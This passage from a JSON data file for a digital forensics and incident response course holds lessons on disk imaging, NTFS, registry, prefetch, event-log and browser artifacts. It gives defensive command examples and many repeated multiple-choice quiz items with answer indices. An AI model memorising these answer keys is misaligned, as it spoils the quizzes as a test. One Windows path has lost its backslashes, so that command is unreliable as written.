by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"autopsy-intro","cat":"Forensics & IR","title":"Autopsy Digital Forensics","diff":1,"xp":75,"intro":"Open-source forensic platform for disk analysis.","sections":[{"type":"text","content":"Autopsy analyzes disk images, recovers deleted files, parses browser history."},{"type":"code","lang":"bash","content":"# Add data source, select ingest modules:\n# Hash Lookup, Keyword Search, Web Artifacts, Email Parser"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Autopsy uses which toolkit?","opts":["Wireshark","The Sleuth Kit","Volatility","Metasploit"],"ans":1},{"type":"quiz","q":"Volatility analyzes...","opts":["Network traffic","Memory dumps","Disk images","Log files"],"ans":1},{"type":"quiz","q":"The most volatile evidence type is...","opts":["Disk files","RAM contents","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"disk-imaging","cat":"Forensics & IR","title":"Forensic Disk Imaging","diff":1,"xp":75,"intro":"Bit-for-bit copy of a drive.","sections":[{"type":"text","content":"Forensic image includes unallocated space. Use write blocker, calculate hashes."},{"type":"code","lang":"bash","content":"dc3dd if=/dev/sda of=evidence.dd hash=sha256 log=evidence.log"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Why use a write blocker?","opts":["Speed up imaging","Prevent modifying evidence","Encrypt image","Compress data"],"ans":1},{"type":"quiz","q":"Volatile evidence should be collected...","opts":["Last","First (before it disappears)","Never","After the investigation"],"ans":1},{"type":"quiz","q":"A disk image should be...","opts":["Compressed","A bit-for-bit exact copy","Encrypted","Partial"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Malware sandboxing means...","opts":["Deleting malware","Running it in an isolated environment to observe behavior","Encrypting it","Reverse engineering"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"ntfs-artifacts","cat":"Forensics & IR","title":"NTFS Forensic Artifacts","diff":2,"xp":200,"intro":"MFT, USN Journal \u2014 NTFS records everything.","sections":[{"type":"text","content":"$MFT records every file with timestamps. $UsnJrnl logs every change. Survives deletion."},{"type":"code","lang":"bash","content":"analyzemft.py -f '$MFT' -o mft.csv"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Which NTFS artifact logs every change?","opts":["$MFT","$UsnJrnl","$LogFile","$Bitmap"],"ans":1},{"type":"quiz","q":"Chain of custody proves...","opts":["The suspect is guilty","Evidence integrity was maintained","The investigation is complete","Tools were updated"],"ans":1},{"type":"quiz","q":"Volatility analyzes...","opts":["Network traffic","Memory dumps","Disk images","Log files"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"registry-forensics","cat":"Forensics & IR","title":"Windows Registry Forensics","diff":2,"xp":150,"intro":"Registry records user activity, USB devices, recent files.","sections":[{"type":"text","content":"SAM, SYSTEM, SOFTWARE, NTUSER.DAT \u2014 wealth of forensic evidence."},{"type":"code","lang":"bash","content":"regripper -r NTUSER.DAT -p all\n# RecentDocs, TypedPaths, USBSTOR"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Per-user activity stored in?","opts":["SAM","SYSTEM","NTUSER.DAT","SOFTWARE"],"ans":2},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Malware sandboxing means...","opts":["Deleting malware","Running it in an isolated environment to observe behavior","Encrypting it","Reverse engineering"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"prefetch-analysis","cat":"Forensics & IR","title":"Prefetch File Analysis","diff":1,"xp":75,"intro":"Windows records every program execution.","sections":[{"type":"text","content":"Prefetch records execution count, last 8 run times, files accessed. Persists after deletion."},{"type":"code","lang":"bash","content":"PECmd.py -d C:WindowsPrefetch"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Prefetch records?","opts":["Network connections","Program executions with timestamps","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Malware sandboxing means...","opts":["Deleting malware","Running it in an isolated environment to observe behavior","Encrypting it","Reverse engineering"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"event-log-analysis","cat":"Forensics & IR","title":"Windows Event Log Analysis","diff":1,"xp":100,"intro":"4624, 4625, 4688, 7045 \u2014 the critical event IDs.","sections":[{"type":"text","content":"4624 (logon), 4625 (failed), 4688 (process creation), 7045 (service installed)."},{"type":"code","lang":"powershell","content":"Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4625} | Select TimeCreated, Message"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Event ID for successful logon?","opts":["4625","4624","4688","7045"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"amcache-shimcache","cat":"Forensics & IR","title":"Amcache and Shimcache","diff":2,"xp":150,"intro":"Program execution artifacts persisting after uninstall.","sections":[{"type":"text","content":"Shimcache records file path and last modified. Amcache records SHA1 hashes."},{"type":"code","lang":"bash","content":"ShimCacheParser.py -i SYSTEM -o shimcache.csv\nAmcacheParser.py -f Amcache.hve -o amcache.csv"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Unique evidence from Amcache?","opts":["File size","SHA1 hash","Last modified","File path"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Malware sandboxing means...","opts":["Deleting malware","Running it in an isolated environment to observe behavior","Encrypting it","Reverse engineering"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"browser-forensics","cat":"Forensics & IR","title":"Browser Forensics","diff":1,"xp":75,"intro":"History, downloads, cookies, saved passwords.","sections":[{"type":"text","content":"Browsers store data in SQLite: history, passwords, cookies, autofill."},{"type":"code","lang":"bash","content":"sqlite3 History 'SELECT url, title FROM urls ORDER BY last_visit_time DESC LIMIT 20'"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Browser storage format?","opts":["MySQL","SQLite","JSON","XML"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal 